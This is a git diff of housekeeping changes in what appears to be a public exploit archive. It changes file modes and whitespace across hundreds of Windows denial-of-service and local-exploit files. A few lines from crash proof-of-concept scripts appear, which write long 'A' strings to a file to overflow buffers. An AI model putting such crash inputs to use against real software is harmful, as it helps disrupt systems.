a/platforms/windows/dos/43058.c +++ b/platforms/windows/dos/43058.c @@ -133,9 +133,4 @@ int main(int argc, char *argv[]) CloseHandle(hDevice); return 0; -} - - - - - +} \ No newline at end of file diff --git a/platforms/windows/dos/43060.py b/platforms/windows/dos/43060.py index f34bd53ec..e92385c06 100755 --- a/platforms/windows/dos/43060.py +++ b/platforms/windows/dos/43060.py @@ -173,4 +173,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/43120.txt b/platforms/windows/dos/43120.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/43124.py b/platforms/windows/dos/43124.py index 3ceb9c395..3e2664073 100755 --- a/platforms/windows/dos/43124.py +++ b/platforms/windows/dos/43124.py @@ -22,6 +22,4 @@ crash = "A"*24538 #crashes on 24538, but more will do writeFile = open (file, "w") writeFile.write( crash ) -writeFile.close() - - +writeFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/43131.html b/platforms/windows/dos/43131.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/43135.py b/platforms/windows/dos/43135.py index 1ce425f47..3752e9875 100755 --- a/platforms/windows/dos/43135.py +++ b/platforms/windows/dos/43135.py @@ -35,4 +35,4 @@ crash = "A"*260 #crashes on 260 for x86, but more will do writeFile = open (file, "w") writeFile.write( crash ) #writeFile.write( crash64 ) -writeFile.close() \ No newline at end of file +writeFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/43144.txt b/platforms/windows/dos/43144.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4335.txt b/platforms/windows/dos/4335.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4337.c b/platforms/windows/dos/4337.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4344.php b/platforms/windows/dos/4344.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4369.html b/platforms/windows/dos/4369.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4373.html b/platforms/windows/dos/4373.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4375.txt b/platforms/windows/dos/4375.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4379.html b/platforms/windows/dos/4379.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4409.html b/platforms/windows/dos/4409.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4474.html b/platforms/windows/dos/4474.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4479.html b/platforms/windows/dos/4479.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4610.html b/platforms/windows/dos/4610.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4613.html b/platforms/windows/dos/4613.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/463.c b/platforms/windows/dos/463.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/468.c b/platforms/windows/dos/468.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4682.c b/platforms/windows/dos/4682.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4688.html b/platforms/windows/dos/4688.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4716.html b/platforms/windows/dos/4716.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4748.php b/platforms/windows/dos/4748.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4757.txt b/platforms/windows/dos/4757.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/477.c b/platforms/windows/dos/477.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4801.html b/platforms/windows/dos/4801.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4829.html b/platforms/windows/dos/4829.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4885.txt b/platforms/windows/dos/4885.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4911.c b/platforms/windows/dos/4911.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4931.txt b/platforms/windows/dos/4931.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5043.html b/platforms/windows/dos/5043.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5085.txt b/platforms/windows/dos/5085.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5086.html b/platforms/windows/dos/5086.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5110.txt b/platforms/windows/dos/5110.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5142.c b/platforms/windows/dos/5142.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5201.txt b/platforms/windows/dos/5201.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5217.html b/platforms/windows/dos/5217.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5225.html b/platforms/windows/dos/5225.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5321.txt b/platforms/windows/dos/5321.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5327.txt b/platforms/windows/dos/5327.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5354.c b/platforms/windows/dos/5354.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5396.txt b/platforms/windows/dos/5396.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5460.html b/platforms/windows/dos/5460.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5515.txt b/platforms/windows/dos/5515.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5547.txt b/platforms/windows/dos/5547.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/562.c b/platforms/windows/dos/562.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5682.html b/platforms/windows/dos/5682.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5687.txt b/platforms/windows/dos/5687.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/571.c b/platforms/windows/dos/571.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5843.html b/platforms/windows/dos/5843.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/5851.txt b/platforms/windows/dos/5851.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/603.c b/platforms/windows/dos/603.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/604.c b/platforms/windows/dos/604.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/605.c b/platforms/windows/dos/605.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/606.c b/platforms/windows/dos/606.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/607.c b/platforms/windows/dos/607.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6072.html b/platforms/windows/dos/6072.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6077.c b/platforms/windows/dos/6077.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6083.html b/platforms/windows/dos/6083.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6090.html b/platforms/windows/dos/6090.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/61.c b/platforms/windows/dos/61.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/611.c b/platforms/windows/dos/611.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6181.php b/platforms/windows/dos/6181.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6201.html b/platforms/windows/dos/6201.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6216.html b/platforms/windows/dos/6216.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6244.js b/platforms/windows/dos/6244.js old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6251.txt b/platforms/windows/dos/6251.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6253.txt b/platforms/windows/dos/6253.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/626.c b/platforms/windows/dos/626.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6262.txt b/platforms/windows/dos/6262.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/628.c b/platforms/windows/dos/628.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6319.html b/platforms/windows/dos/6319.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6326.html b/platforms/windows/dos/6326.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6327.html b/platforms/windows/dos/6327.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6330.txt b/platforms/windows/dos/6330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6345.html b/platforms/windows/dos/6345.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6353.txt b/platforms/windows/dos/6353.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6365.php b/platforms/windows/dos/6365.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6372.html b/platforms/windows/dos/6372.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6386.html b/platforms/windows/dos/6386.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6391.htm b/platforms/windows/dos/6391.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6424.html b/platforms/windows/dos/6424.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6434.html b/platforms/windows/dos/6434.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6458.c b/platforms/windows/dos/6458.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/649.c b/platforms/windows/dos/649.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6496.c b/platforms/windows/dos/6496.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6497.c b/platforms/windows/dos/6497.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6498.c b/platforms/windows/dos/6498.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/65.c b/platforms/windows/dos/65.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/651.c b/platforms/windows/dos/651.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6515.c b/platforms/windows/dos/6515.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/653.c b/platforms/windows/dos/653.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/655.c b/platforms/windows/dos/655.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6554.html b/platforms/windows/dos/6554.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6560.txt b/platforms/windows/dos/6560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6565.txt b/platforms/windows/dos/6565.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6588.txt b/platforms/windows/dos/6588.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6609.html b/platforms/windows/dos/6609.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6614.html b/platforms/windows/dos/6614.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6615.html b/platforms/windows/dos/6615.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6616.txt b/platforms/windows/dos/6616.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6619.html b/platforms/windows/dos/6619.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/664.c b/platforms/windows/dos/664.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6647.c b/platforms/windows/dos/6647.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/665.c b/platforms/windows/dos/665.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6658.txt b/platforms/windows/dos/6658.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6660.txt b/platforms/windows/dos/6660.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6668.txt b/platforms/windows/dos/6668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/667.c b/platforms/windows/dos/667.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6671.c b/platforms/windows/dos/6671.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6672.txt b/platforms/windows/dos/6672.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6673.txt b/platforms/windows/dos/6673.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/671.c b/platforms/windows/dos/671.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/672.c b/platforms/windows/dos/672.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6732.txt b/platforms/windows/dos/6732.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6756.txt b/platforms/windows/dos/6756.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6761.html b/platforms/windows/dos/6761.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/679.c b/platforms/windows/dos/679.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/682.c b/platforms/windows/dos/682.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6824.txt b/platforms/windows/dos/6824.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/683.c b/platforms/windows/dos/683.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6832.html b/platforms/windows/dos/6832.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/6834.c b/platforms/windows/dos/6834.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/687.c b/platforms/windows/dos/687.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/700.html b/platforms/windows/dos/700.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7090.txt b/platforms/windows/dos/7090.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7109.txt b/platforms/windows/dos/7109.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7126.html b/platforms/windows/dos/7126.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7178.txt b/platforms/windows/dos/7178.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/721.html b/platforms/windows/dos/721.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7226.html b/platforms/windows/dos/7226.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7249.php b/platforms/windows/dos/7249.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7296.txt b/platforms/windows/dos/7296.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/73.c b/platforms/windows/dos/73.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7307.txt b/platforms/windows/dos/7307.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7314.txt b/platforms/windows/dos/7314.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7358.html b/platforms/windows/dos/7358.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/736.c b/platforms/windows/dos/736.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7401.txt b/platforms/windows/dos/7401.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/742.c b/platforms/windows/dos/742.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/743.html b/platforms/windows/dos/743.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7460.html b/platforms/windows/dos/7460.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/755.c b/platforms/windows/dos/755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7556.php b/platforms/windows/dos/7556.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7571.txt b/platforms/windows/dos/7571.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7585.txt b/platforms/windows/dos/7585.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/770.txt b/platforms/windows/dos/770.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7710.html b/platforms/windows/dos/7710.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7742.txt b/platforms/windows/dos/7742.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7750.html b/platforms/windows/dos/7750.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7790.txt b/platforms/windows/dos/7790.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/780.c b/platforms/windows/dos/780.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/783.c b/platforms/windows/dos/783.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7869.html b/platforms/windows/dos/7869.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7882.html b/platforms/windows/dos/7882.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/7902.txt b/platforms/windows/dos/7902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8077.html b/platforms/windows/dos/8077.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8090.txt b/platforms/windows/dos/8090.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/810.c b/platforms/windows/dos/810.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8102.txt b/platforms/windows/dos/8102.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/813.c b/platforms/windows/dos/813.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8156.txt b/platforms/windows/dos/8156.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8180.c b/platforms/windows/dos/8180.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8190.txt b/platforms/windows/dos/8190.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/82.c b/platforms/windows/dos/82.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8281.txt b/platforms/windows/dos/8281.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8294.c b/platforms/windows/dos/8294.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8306.txt b/platforms/windows/dos/8306.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8314.php b/platforms/windows/dos/8314.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8335.c b/platforms/windows/dos/8335.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8352.txt b/platforms/windows/dos/8352.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8356.txt b/platforms/windows/dos/8356.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8390.cpp b/platforms/windows/dos/8390.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8391.txt b/platforms/windows/dos/8391.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/841.c b/platforms/windows/dos/841.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/843.c b/platforms/windows/dos/843.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8434.html b/platforms/windows/dos/8434.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8447.txt b/platforms/windows/dos/8447.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8452.c b/platforms/windows/dos/8452.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8479.html b/platforms/windows/dos/8479.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/849.c b/platforms/windows/dos/849.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8512.txt b/platforms/windows/dos/8512.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8523.txt b/platforms/windows/dos/8523.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8524.txt b/platforms/windows/dos/8524.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8542.php b/platforms/windows/dos/8542.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8573.html b/platforms/windows/dos/8573.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8601.txt b/platforms/windows/dos/8601.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/861.c b/platforms/windows/dos/861.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8650.c b/platforms/windows/dos/8650.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8665.html b/platforms/windows/dos/8665.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8677.txt b/platforms/windows/dos/8677.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8712.txt b/platforms/windows/dos/8712.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/874.cpp b/platforms/windows/dos/874.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8767.c b/platforms/windows/dos/8767.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8777.txt b/platforms/windows/dos/8777.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/882.cpp b/platforms/windows/dos/882.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8832.php b/platforms/windows/dos/8832.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8837.txt b/platforms/windows/dos/8837.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8862.txt b/platforms/windows/dos/8862.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/888.txt b/platforms/windows/dos/888.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/8899.txt b/platforms/windows/dos/8899.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9.c b/platforms/windows/dos/9.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/908.c b/platforms/windows/dos/908.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9084.txt b/platforms/windows/dos/9084.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9100.html b/platforms/windows/dos/9100.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9113.txt b/platforms/windows/dos/9113.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9114.txt b/platforms/windows/dos/9114.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9116.html b/platforms/windows/dos/9116.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9158.html b/platforms/windows/dos/9158.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9163.txt b/platforms/windows/dos/9163.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9167.txt b/platforms/windows/dos/9167.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9169.txt b/platforms/windows/dos/9169.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9170.txt b/platforms/windows/dos/9170.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9222.cpp b/platforms/windows/dos/9222.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9253.html b/platforms/windows/dos/9253.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9295.txt b/platforms/windows/dos/9295.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9304.txt b/platforms/windows/dos/9304.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/931.html b/platforms/windows/dos/931.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9317.c b/platforms/windows/dos/9317.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9362.html b/platforms/windows/dos/9362.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9382.txt b/platforms/windows/dos/9382.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/941.c b/platforms/windows/dos/941.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9411.cpp b/platforms/windows/dos/9411.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9417.txt b/platforms/windows/dos/9417.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/942.c b/platforms/windows/dos/942.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9446.cpp b/platforms/windows/dos/9446.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9449.txt b/platforms/windows/dos/9449.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9455.html b/platforms/windows/dos/9455.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9480.html b/platforms/windows/dos/9480.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9496.txt b/platforms/windows/dos/9496.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9515.txt b/platforms/windows/dos/9515.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9516.txt b/platforms/windows/dos/9516.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9517.txt b/platforms/windows/dos/9517.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9537.htm b/platforms/windows/dos/9537.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9549.c b/platforms/windows/dos/9549.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9554.html b/platforms/windows/dos/9554.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9584.txt b/platforms/windows/dos/9584.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9585.txt b/platforms/windows/dos/9585.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9587.txt b/platforms/windows/dos/9587.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9594.txt b/platforms/windows/dos/9594.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9597.txt b/platforms/windows/dos/9597.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9617.txt b/platforms/windows/dos/9617.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9621.txt b/platforms/windows/dos/9621.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9667.c b/platforms/windows/dos/9667.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9668.txt b/platforms/windows/dos/9668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9670.txt b/platforms/windows/dos/9670.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9677.c b/platforms/windows/dos/9677.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9682.txt b/platforms/windows/dos/9682.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9683.txt b/platforms/windows/dos/9683.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9684.txt b/platforms/windows/dos/9684.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9685.txt b/platforms/windows/dos/9685.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9701.c b/platforms/windows/dos/9701.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9717.txt b/platforms/windows/dos/9717.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/978.cpp b/platforms/windows/dos/978.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9806.html b/platforms/windows/dos/9806.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9814.py b/platforms/windows/dos/9814.py similarity index 100% rename from platforms/windows/remote/9814.py rename to platforms/windows/dos/9814.py diff --git a/platforms/windows/dos/983.cpp b/platforms/windows/dos/983.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9871.txt b/platforms/windows/dos/9871.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9874.txt b/platforms/windows/dos/9874.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9879.txt b/platforms/windows/dos/9879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/988.cpp b/platforms/windows/dos/988.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9881.txt b/platforms/windows/dos/9881.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9971.php b/platforms/windows/dos/9971.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/9999.txt b/platforms/windows/dos/9999.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10009.txt b/platforms/windows/local/10009.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10010.txt b/platforms/windows/local/10010.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10039.txt b/platforms/windows/local/10039.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10084.txt b/platforms/windows/local/10084.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1019.c b/platforms/windows/local/1019.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10211.txt b/platforms/windows/local/10211.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10213.txt b/platforms/windows/local/10213.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10244.txt b/platforms/windows/local/10244.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10281.php b/platforms/windows/local/10281.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10295.txt b/platforms/windows/local/10295.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10298.c b/platforms/windows/local/10298.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1032.cpp b/platforms/windows/local/1032.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1034.cpp b/platforms/windows/local/1034.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10475.txt b/platforms/windows/local/10475.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10484.txt b/platforms/windows/local/10484.txt old mode 100755 new mode 100644 index 25bfdf142..4dba381f1 --- a/platforms/windows/local/10484.txt +++ b/platforms/windows/local/10484.txt @@ -78,4 +78,4 @@ will be fixed in new versions of vulnerable products CREDITS Maxim A. Kulakov (ShineShadow) -ss_contacts[at]hotmail.com \ No newline at end of file +ss_contacts[at]hotmail.com \ No newline at end of file diff --git a/platforms/windows/local/10556.c b/platforms/windows/local/10556.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10619.c b/platforms/windows/local/10619.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/10646.c b/platforms/windows/local/10646.c old mode 100755 new mode 100644 diff --git 